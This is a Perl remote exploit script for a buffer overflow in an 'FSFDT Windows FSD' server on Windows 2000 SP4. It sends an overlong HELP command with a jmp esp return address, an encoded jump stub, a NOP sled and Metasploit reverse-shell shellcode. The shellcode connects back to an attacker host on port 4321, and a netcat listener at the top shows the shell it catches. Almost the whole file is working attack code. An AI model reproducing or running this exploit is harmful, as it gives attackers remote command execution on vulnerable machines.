fsfdt-overflow.txt

`# ~$ nc -l -p 4321  
# Microsoft Windows 2000 [Version 5.00.2195]  
# (C) Copyright 1985-2000 Microsoft Corp.  
#   
# E:\draft\fsd1110\windows>_  
#   
# -------------------------------------------  
  
#!/usr/bin/perl  
  
# FSFDT remote exploit by weak[at]fraglab.at  
# spawns reverse shell to 10.0.0.100:4321  
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4  
  
use IO::Socket;  
  
if( $#ARGV < 1 )  
{  
print "usage: perl ".$0." <ip> <port>";  
exit();  
}  
my $ip = $ARGV[0];  
my $port = $ARGV[1];  
  
print "connecting...\n";  
my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', );  
die "could not create socket: $!\n" unless $sock;  
  
# jmp esp in KERNEL32.DLL 5.0.2195.7006  
my $jmpesp = "\xB7\x49\xE7\x77";  
  
# encoded 'jmp 0x400' to jump to stage2  
my $jmpcode =   
"\xeb\x11\x5e\x31\xc9\xb1\x1e\x80\x6c\x0e\xff\x35\x80\xe9\x01".  
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x0e\x16\x0e\x69\x59\x8d".  
"\x8d\x8d\x8d\xb5\x1d\x1c\x66\xfe\x9b\xb6\x1e\x30\x34\xb5\x65".  
"\x36\x75\x17\x2f\x1d\x36\x3a\x36\x36";  
  
# win32_reverse - EXITFUNC=thread LHOST=10.0.0.2 LPORT=4321 Size=312 Encoder=PexFnstenvSub http://metasploit.com  
# bad chars: 0x00 0x0A 0x0D 0x20 0x29   
my $shellcode =  
"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e".  
"\x2a\x6e\x8f\x83\xeb\xfc\xe2\xf4\xe2\x40\x85\xc2\xf6\xd3\x91\x70".  
"\xe1\x4a\xe5\xe3\x3a\x0e\xe5\xca\x22\xa1\x12\x8a\x66\x2b\x81\x04".  
"\x51\x32\xe5\xd0\x3e\x2b\x85\xc6\x95\x1e\xe5\x8e\xf0\x1b\xae\x16".  
"\xb2\xae\xae\xfb\x19\xeb\xa4\x82\x1f\xe8\x85\x7b\x25\x7e\x4a\xa7".  
"\x6b\xcf\xe5\xd0\x3a\x2b\x85\xe9\x95\x26\x25\x04\x41\x36\x6f\x64".  
"\x1d\x06\xe5\x06\x72\x0e\x72\xee\xdd\x1b\xb5\xeb\x95\x69\x5e\x04".  
"\x5e\x26\xe5\xff\x02\x87\xe5\xcf\x16\x74\x06\x01\x50\x24\x82\xdf".  
"\xe1\xfc\x08\xdc\x78\x42\x5d\xbd\x76\x5d\x1d\xbd\x41\x7e\x91\x5f".  
"\x76\xe1\x83\x73\x25\x7a\x91\x59\x41\xa3\x8b\xe9\x9f\xc7\x66\x8d".  
"\x4b\x40\x6c\x70\xce\x42\xb7\x86\xeb\x87\x39\x70\xc8\x79\x3d\xdc".  
"\x4d\x69\x3d\xcc\x4d\xd5\xbe\xe7\x14\x2a\x6e\xeb\x78\x42\x7e\x6e".  
"\x78\x79\xe7\x6e\x8b\x42\x82\x76\xb4\x4a\x39\x70\xc8\x40\x7e\xde".  
"\x4b\xd5\xbe\xe9\x74\x4e\x08\xe7\x7d\x47\x04\xdf\x47\x03\xa2\x06".  
"\xf9\x40\x2a\x06\xfc\x1b\xae\x7c\xb4\xbf\xe7\x72\xe0\x68\x43\x71".  
"\x5c\x06\xe3\xf5\x26\x81\xc5\x24\x76\x58\x90\x3c\x08\xd5\x1b\xa7".  
"\xe1\xfc\x35\xd8\x4c\x7b\x3f\xde\x74\x2b\x3f\xde\x4b\x7b\x91\x5f".  
"\x76\x87\xb7\x8a\xd0\x79\x91\x59\x74\xd5\x91\xb8\xe1\xfa\x06\x68".  
"\x67\xec\x17\x70\x6b\x2e\x91\x59\xe1\x5d\x92\x70\xce\x42\x81\x41".  
"\xfe\x4a\x3d\x70\xc8\xd5\xbe\x8f";  
  
print "sending payload...\n";  
print $sock "HELP " . "A"x200 . $jmpesp . "\x90"x8 . $jmpcode . "\n" . "\x90"x400 . $shellcode;  
close($sock);  
  
print "done.\n";  
  
  
`